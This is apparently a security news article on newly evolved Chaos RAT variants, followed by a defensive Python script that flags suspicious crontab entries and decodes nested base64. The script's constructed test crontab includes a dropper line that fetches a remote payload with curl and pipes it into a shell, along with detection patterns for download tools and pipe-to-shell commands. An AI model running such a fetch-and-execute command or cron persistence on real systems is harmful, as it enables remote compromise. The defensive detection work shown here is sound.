The open-source remote admin tool has been hijacked by threat actors for stealthy attacks, persistence, and potential ransomware deployment across platforms.
Acronis Threat Research Unit (TRU) has uncovered newly evolved variants of the Chaos Remote Access Trojan (RAT), a cross-platform tool now being abused in the wild against both Linux and Windows systems. Originally published on GitHub as a legitimate open-source remote management utility, Chaos RAT is becoming a favorite among cybercriminals for its stealth, flexibility, and low detection footprint.
The latest samples identified by Acronis TRU researchers reveal a concerning trend: Chaos RAT is evolving with expanded platform compatibility, enhanced obfuscation techniques, and stronger persistence mechanisms. While it remains less prevalent than more mainstream malware families, its ability to bypass endpoint defenses and maintain undetected access is making it a valuable tool for espionage, data theft, and even ransomware deployment.
“Open-source flexibility is a double-edged sword—Chaos RAT shows how quickly useful tools can become dangerous,” said Candid Wüest, VP of Research at Acronis. “This is a wake-up call for defenders to monitor not just traditional threats but also emerging abuse of open-source software in cybercrime supply chains.”
Acronis also disclosed a critical vulnerability in Chaos RAT’s web-based admin panel that allows remote code execution (RCE) on the server hosting the panel. The flaw does not directly affect victim machines, but it underscores the insecure development practices behind some open-source tools, and it means other malicious operators can hijack a rival’s command-and-control infrastructure.
In one recent incident, a malware sample submitted to VirusTotal from India carried the payload inside an innocuous-looking archive named NetworkAnalyzer.tar.gz. The file was likely passed off as a Linux network troubleshooting utility, which points to delivery by phishing or through a compromised website.
Earlier Chaos RAT campaigns relied on cron jobs for persistence, a technique common on Unix-like systems, often alongside cryptocurrency miners. Newer variants show a significant evolution: the configuration has moved from plaintext files to base64-encoded blobs wrapped in additional decoding layers, an attempt to slow down reverse engineering.
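The cron persistence and layered base64 configuration described above lend themselves to a simple triage check. The script below is an added example written for this page; it is not Acronis TRU's tooling and not code from Chaos RAT. It scans crontab text for common persistence indicators (execution from temp or hidden directories, download tools, data piped into a shell, run-time base64 decoding) and peels any embedded base64 blob layer by layer until plaintext appears. The sample crontab, the hidden path /tmp/.x/updater, the encoded command and the host 198.51.100.23 (a documentation address range) are all constructed here; this page does not describe the actual decoding layers used by Chaos RAT samples, so the peeler is deliberately generic.

```python
"""Triage helper: flag suspicious crontab entries and peel nested base64.

Added example. The crontab lines, the hidden path and the encoded command
below are constructed for illustration, not taken from any real sample.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Generic cron-persistence indicators (not specific to Chaos RAT).
SUSPICIOUS_PATH = re.compile(r"(^|[\s=])/(tmp|dev/shm|var/tmp)/|/\.[^/\s]")  # temp dir or hidden dir
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|dash|zsh)\b")                       # data piped into a shell
DOWNLOADER = re.compile(r"\b(curl|wget)\b")                                    # fetches a remote payload
B64_DECODE = re.compile(r"base64\s+(-d|--decode)\b")                           # decodes at run time
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")                            # a base64-looking blob
CHECKS = [
    (SUSPICIOUS_PATH, "runs from a temp or hidden directory"),
    (PIPE_TO_SHELL, "pipes data into a shell"),
    (DOWNLOADER, "uses a download tool"),
    (B64_DECODE, "decodes base64 at run time"),
]


@dataclass
class Finding:
    line: str
    schedule: str
    command: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None  # innermost plaintext of an embedded base64 blob


def split_cron_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a crontab entry; None for comments,
    blank lines and VAR=value assignments."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
        return None
    if line.startswith("@"):                  # @reboot, @daily, ...
        parts = line.split(None, 1)
    else:                                     # five time fields, then the command
        parts = line.split(None, 5)
        if len(parts) < 6:
            return None
        parts = [" ".join(parts[:5]), parts[5]]
    return (parts[0], parts[1]) if len(parts) == 2 else None


def peel_base64(blob: str, max_layers: int = 8) -> Tuple[str, int]:
    """Base64-decode repeatedly while each result is printable text that still
    looks like base64. Returns (innermost text, layers removed); 0 layers means
    the input was not valid base64 at all (e.g. a path that merely looks like it)."""
    current, layers = blob.strip(), 0
    if not current:
        return current, 0
    while layers < max_layers:
        try:
            text = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break                              # not base64, or binary output: stop here
        if not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            break
        current, layers = text, layers + 1
        if not B64_TOKEN.fullmatch(current.strip()):
            break                              # reached plaintext
    return current, layers


def analyze_crontab(crontab: str) -> List[Finding]:
    """Scan crontab text and return the entries matching at least one indicator."""
    findings: List[Finding] = []
    for raw in crontab.splitlines():
        parsed = split_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        finding = Finding(raw, schedule, command)
        finding.reasons += [why for rx, why in CHECKS if rx.search(command)]
        for token in B64_TOKEN.findall(command):
            inner, layers = peel_base64(token)
            if layers == 0:
                continue
            finding.decoded = inner
            finding.reasons.append(f"embedded base64 blob peeled through {layers} layer(s)")
            # The decoded command deserves the same scrutiny as the visible one.
            finding.reasons += [f"decoded command: {why}" for rx, why in CHECKS if rx.search(inner)]
        if finding.reasons:
            findings.append(finding)
    return findings


INNER_CMD = "curl -fsSL http://198.51.100.23/stage | sh"  # constructed; 198.51.100.0/24 is TEST-NET-2


def wrap_base64(command: str, layers: int = 2) -> str:
    """Encode a command through several base64 layers (used to build the sample)."""
    data = command.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()


# Constructed crontab: two benign entries, one hidden-path binary, one nested-base64 dropper.
SAMPLE_CRONTAB = "\n".join([
    "# m h dom mon dow command",
    "PATH=/usr/local/bin:/usr/bin:/bin",
    "0 3 * * * /usr/bin/apt-get update",
    "*/5 * * * * /usr/local/bin/backup.sh",
    "@reboot /tmp/.x/updater",
    f"* * * * * echo {wrap_base64(INNER_CMD)} | base64 -d | sh",
])

if __name__ == "__main__":
    for f in analyze_crontab(SAMPLE_CRONTAB):
        print(f"[{f.schedule}] {f.command[:60]}")
        for why in f.reasons:
            print("   -", why)
        if f.decoded:
            print("   decoded:", f.decoded)
```

Run against a real host with `crontab -l` output, plus the files under /etc/cron.d and the per-user spools under /var/spool/cron, feeding each file's text to analyze_crontab. The peeler stops as soon as a decode yields non-printable bytes, so a blob whose innermost layer is a binary or a custom-encoded configuration (as the newer variants use) is reported with however many base64 layers were removed and left for manual reverse engineering rather than being mangled.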
The discovery highlights the growing threat from weaponized open-source tools and the need for better threat detection, especially in Linux environments, which enterprise security programs often overlook.